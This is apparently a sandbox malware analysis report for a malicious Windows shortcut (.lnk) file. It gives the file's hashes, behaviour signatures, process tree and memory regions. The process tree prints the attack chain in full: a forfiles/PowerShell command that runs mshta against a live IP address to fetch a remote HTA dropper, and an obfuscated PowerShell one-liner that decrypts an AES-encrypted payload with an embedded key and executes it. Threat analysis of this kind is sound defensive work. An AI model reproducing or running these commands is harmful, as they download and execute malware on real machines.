Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240215-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240215-en, locale:en-us, os:windows7-x64, system
  • submitted
    16/03/2024, 02:25

General

  • Target

    6086f319caf204ec965aac6797ced062b71bec0f46722100b782fa3bfc31d9bd.lnk

  • Size

    1KB

  • MD5

    90a6eed71981efdcdbc0c8c0151cfb0e

  • SHA1

    c21e13a29ad18e73b88eddec919b85925a95952a

  • SHA256

    6086f319caf204ec965aac6797ced062b71bec0f46722100b782fa3bfc31d9bd

  • SHA512

    fa7b96a7e404dc187d43f04ccd55637a959fbb7950d6b69e80539b4026cfd62460a74330dadb2a8e1578ddf0b87f31a4c8bac6451bd57130aa90f5a5bce77bbd

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://89.23.98.210/qqeng

Signatures

  • Blocklisted process makes network request 5 IoCs
  • Downloads MZ/PE file
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\6086f319caf204ec965aac6797ced062b71bec0f46722100b782fa3bfc31d9bd.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2980
    • C:\Windows\System32\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p C:\Windows\Vss /c "powershell start mshta http://89.23.98.210/qqeng
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2552
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        start mshta http://89.23.98.210/qqeng
        3⤵
        • Drops file in Windows directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2792
        • C:\Windows\system32\mshta.exe
          "C:\Windows\system32\mshta.exe" http://89.23.98.210/qqeng
          4⤵
          • Blocklisted process makes network request
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:2448
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function vTMsUbI($pvPiSaK){return -split ($pvPiSaK -replace '..', '0x$& ')};$DDZuEbM = vTMsUbI('2EEA8941C1967724856754736159546956BD49A37C0FCCCC019A7902B2F7377223351478D94095CAB7F7575DB48B7888E05DA126156BA4D512049E30C56AB0565023B79613557DF933D7654B2EEFD5218913F64CC80EF58C759DA922A382A9F9A5D83DC2AA6C54F49ABE564470BBA07A95B3416A8E37F7BB5B0FF8C667135BCBDFB64E76FE8C20111234D21AF3B82F2237F9CD00D57356B8C20C45A93686D00D03286206824363AC9ABAE755EB081D827B4A8138B72E5B6B1B696C8CBAE0AB54E1ECB9BCA2DFE6AA14701349B851719FDA148BF227D2CBB1C70AC777C3246A66EB70A75BA2AC17565608748CBC6EDCCFB5B4C9F86D764406F66EFFB2CA141F284F0A7B88E1AE815F89D9252C8E77FD111E7C2F8EB1DC66C76589BAAC727BFB1EDB021E932342EB72DB318BC4A36179C0C5CF70795D0761138A36C1BD37F278A2F571C09575FFC57DEDCF79AE87941DD0BB334EC92CE64D0C8B518903BBAF7155856A83AA9286B06310D255390073E2997DB6E4763BAE864A70DF2B8300547E678644A0B2B4A91BDA0555C692CD3904B199D217D897111CB7F9E20B1C642CB25C7CCE304AAEE359D2595B3D645856E55E04E714B742BB20DD1876139871A9153834A9D96EFE8624F133EA968FF954305F71718E3BAF50BB06EF8F569D25916E4200F6DAA51DD582D0BB183265769AE45B65D59D6DAAD7D24388BC64D566198E072D0684E4A812BED119309279C01830EA4E22E0E986D31CEF7C2A700A8860377F82BC47D36C767CA408D9C9EB6C2F45F66977D04AFE326DDC0349467A342F62699007388135B07AA4A3C9019547CD4F348742E84D2EC52340910278A84BA8A79E9A40AD813D15A4D628EEEBC475733001FDC044E047CAF13540A9C3127CCCA3F27E1FDF7B392CB2AFF6D00F3D36780B548D34602D6FC9714FAA16A624B97A4AAE866B52AA4F3F992E8B73898C34BCCCDB749C0A9602E48CDCC658D9840E9FB0EC44141AADBA92D91C4CC33ECEB4B6A86B4EAB0B25DC950CDA05E4D43AADF3D92985943BA62086C4B8D487537FE589F1F86DFE1E7B7A78E8AF805F5F7C5D7B926FEB19EC212C031070A6E2745D694DD20D2CE59890EBE872C21AB5235BCA04472BE83CDF4B3825BC71CC8A1E9BEA7859DD5A23AE2BD3B6F36DF855487C05821BAFD97441F735A6A921F28249609AC3E67D699D5E691B0FD73FD15B7819E12284442C8F5EAE6BF01E542BAC9F4853D0EEFD36A521FF58A4F23B2612FB6BDA486C8B8B497AA147132
0DF6CC59937B1AC74C7D939F4296E35EC04371B6B1401301D99D69CB90D4686D5C63B8B7DC8C11203511BA49E3CD22CD1B2BDF5A8207B116910025C662F5884F0465307EF278D916CDCA3FD86783830357C61D49FA6EF0C097BB53CA6300C557B64244311063A75A15B5621B8B30428F23AE2772668FC4CC6DAC4C28BFC76AA0EA698F79268317615CB97634D83EB1F8FBA3FF8C7EC2205F2B1EE5405B956543AAD2D06D64A95BE72B8E9AC61C785252BE6796AA0F0E709658F47D14139F1F35B520C3F9C5EC5A18A24C3584A73023AA3D65AC32EB0508B26A071FD8AE3D9E3BDD8A213A36B377007FADCAC3201CEB3854AB367857AABB136AFD2969226C750E0B89BF2A1C07B32D69B3094E4107552C4AA703D7F7F2EB800A4B0278DB696236D319D809E1E385510F3D69EDA54A6E1086F8109F4C3DB962DFCC471A47F9081EDB814AD5D135FFA05FA684E4D391AA0D1BA4C37C1271DD00A69F6879455E63626F084172FA8F3D95F6A');$bftik = [System.Security.Cryptography.Aes]::Create();$bftik.Key = vTMsUbI('55676E624475754F69737A6879546E70');$bftik.IV = New-Object byte[] 16;$lJcHtpBA = $bftik.CreateDecryptor();$UZsjRnWNL = $lJcHtpBA.TransformFinalBlock($DDZuEbM, 0, $DDZuEbM.Length);$UVWwHyrcG = [System.Text.Encoding]::Utf8.GetString($UZsjRnWNL);$lJcHtpBA.Dispose();& $UVWwHyrcG.Substring(0,3) $UVWwHyrcG.Substring(3)
            5⤵
            • Blocklisted process makes network request
            • Drops file in Windows directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2752

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    2877d5092f7f51adfea48540a189ff30

    SHA1

    5d27075ccc2aab431c8733df6384090898a06a82

    SHA256

    499fd9bc92a9688afdf07a00fe652e50a5c590ca9e533f0b7f5da9991624fd3f

    SHA512

    63c93e4aabb39b260aa071eac74ff07f0e1687628eb880734bc5c17f6aa46e3aed6b0b4cc8cd3420093c20e48f65a778ff4f309fc9f4cba8a8a0590417aea56b

  • memory/2752-55-0x000007FEF4F80000-0x000007FEF591D000-memory.dmp

    Filesize

    9.6MB

  • memory/2752-59-0x0000000002C30000-0x0000000002CB0000-memory.dmp

    Filesize

    512KB

  • memory/2752-63-0x000007FEF4F80000-0x000007FEF591D000-memory.dmp

    Filesize

    9.6MB

  • memory/2752-62-0x0000000002C30000-0x0000000002CB0000-memory.dmp

    Filesize

    512KB

  • memory/2752-61-0x0000000002C30000-0x0000000002CB0000-memory.dmp

    Filesize

    512KB

  • memory/2752-58-0x000007FEF4F80000-0x000007FEF591D000-memory.dmp

    Filesize

    9.6MB

  • memory/2752-54-0x000000001B6B0000-0x000000001B992000-memory.dmp

    Filesize

    2.9MB

  • memory/2752-60-0x0000000002C30000-0x0000000002CB0000-memory.dmp

    Filesize

    512KB

  • memory/2752-56-0x0000000002C30000-0x0000000002CB0000-memory.dmp

    Filesize

    512KB

  • memory/2752-57-0x0000000001DA0000-0x0000000001DA8000-memory.dmp

    Filesize

    32KB

  • memory/2792-43-0x0000000002B20000-0x0000000002BA0000-memory.dmp

    Filesize

    512KB

  • memory/2792-40-0x000000001B760000-0x000000001BA42000-memory.dmp

    Filesize

    2.9MB

  • memory/2792-42-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp

    Filesize

    9.6MB

  • memory/2792-47-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp

    Filesize

    9.6MB

  • memory/2792-46-0x0000000002B20000-0x0000000002BA0000-memory.dmp

    Filesize

    512KB

  • memory/2792-44-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp

    Filesize

    9.6MB

  • memory/2792-45-0x0000000002B20000-0x0000000002BA0000-memory.dmp

    Filesize

    512KB

  • memory/2792-41-0x0000000002810000-0x0000000002818000-memory.dmp

    Filesize

    32KB